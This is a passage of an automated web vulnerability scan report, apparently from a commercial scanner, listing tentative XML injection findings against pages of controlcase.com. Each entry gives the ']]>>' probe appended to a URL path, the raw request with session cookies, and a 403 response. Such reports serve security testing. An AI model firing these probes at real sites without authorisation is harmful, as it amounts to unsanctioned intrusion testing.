10.83. http://controlcase.com/pa_certification.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /pa_certification.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /pa_certification.php]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:27:31 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.84. http://controlcase.com/partner_pci_dss_services.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /partner_pci_dss_services.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /partner_pci_dss_services.html]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:24:51 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.85. http://controlcase.com/partner_product_sales.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /partner_product_sales.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /partner_product_sales.html]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:24:41 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.86. http://controlcase.com/pci.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /pci.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /pci.php]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:27:29 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.87. http://controlcase.com/pci_certification.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /pci_certification.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /pci_certification.html]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:22:40 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.88. http://controlcase.com/pci_certification.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /pci_certification.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /pci_certification.php]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:26:43 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.89. http://controlcase.com/pci_dss_certification_gapanalysis.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /pci_dss_certification_gapanalysis.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /pci_dss_certification_gapanalysis.html]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:23:13 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.90. http://controlcase.com/pci_dss_vulnerability_scans.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /pci_dss_vulnerability_scans.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /pci_dss_vulnerability_scans.html]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:23:14 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.91. http://controlcase.com/pci_vulnerability_scans.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /pci_vulnerability_scans.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /pci_vulnerability_scans.php]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:27:39 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.92. http://controlcase.com/policy_manager.htm [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /policy_manager.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /policy_manager.htm]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:20:28 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.93. http://controlcase.com/process_contact.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /process_contact.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /process_contact.php]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:28:00 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.94. http://controlcase.com/process_form_DL.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /process_form_DL.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /process_form_DL.php]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:28:05 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.95. http://controlcase.com/process_form_PW.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /process_form_PW.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /process_form_PW.php]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:28:06 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.96. http://controlcase.com/process_reg_form_new_user.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /process_reg_form_new_user.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /process_reg_form_new_user.php]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:28:05 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.97. http://controlcase.com/product_incident_manager.htm [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /product_incident_manager.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /product_incident_manager.htm]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:20:33 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.98. http://controlcase.com/professional_app_security_services.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /professional_app_security_services.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /professional_app_security_services.html]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:21:37 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.99. http://controlcase.com/professional_app_security_services.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /professional_app_security_services.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /professional_app_security_services.php]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:26:42 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.100. http://controlcase.com/professional_pa_gapanalysis.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /professional_pa_gapanalysis.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /professional_pa_gapanalysis.html]]>> HTTP/1.1
Host: controlcase.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208121856.1303664485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=f4764231133ed3c705cc7d27a7b0b2ed; _pk_id.3.4216=e72cf29c5d1c4bcd.1303664485.1.1303664511.1303664485; _pk_ses.3.4216=*; __utma=208121856.1998732058.1303664485.1303664485.1303664485.1; __utmc=208121856; __utmb=208121856.10.10.1303664485

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:16:02 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.101. http://controlcase.com/professional_pci_gapanalysis.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /professional_pci_gapanalysis.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /professional_pci_gapanalysis.html]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:20:59 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
